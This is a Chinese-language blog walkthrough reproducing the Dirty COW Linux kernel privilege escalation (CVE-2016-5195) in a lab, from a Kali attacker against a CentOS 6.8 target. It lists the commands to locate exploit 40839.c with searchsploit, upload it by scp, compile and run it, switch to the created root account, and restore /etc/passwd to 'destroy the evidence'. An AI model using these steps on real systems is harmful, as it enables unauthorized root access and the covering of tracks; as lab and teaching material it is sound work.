Featured image of post Linux渗透测试CVE-2016-5195(脏牛)漏洞复现

Linux渗透测试CVE-2016-5195(脏牛)漏洞复现

前言

脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。

漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)

复现环境

靶机:CentOS6.8(内核版本:2.6.32

攻击机:Kali2021

靶机系统内含有一普通用户(已知用户密码),以及GCC编译环境

查找攻击脚本

1
searchsploit -p 40839.c 

搜索脚本

复制攻击脚本

上文我们知道了攻击脚本的位置,为了以后方便调用,我们将该攻击脚本复制到一个熟知的位置(复制到那里都可以,只要是你熟知的位置,笔者习惯复制到/root下)

1
cp -rp /usr/share/exploitdb/exploits/linux/local/40839.c /root

使用SFTP或SCP上传攻击脚本

1
scp /root/40839.c [username]@[IP]:/home/[username]

使用SCP上传脚本

登录终端并编译攻击脚本

1
 gcc -pthread 40839.c -o dirty -lcrypt

运行攻击脚本

1
./dirty

攻击成功

设置密码并登录root权限用户

1
su firefart

攻击完毕,别忘了毁尸灭迹

1
mv /tmp/passwd.bak /etc/passwd

切换用户,发现该用户有root权限

载入天数...载入时分秒...
使用 Hugo 构建
主题 StackJimmy 设计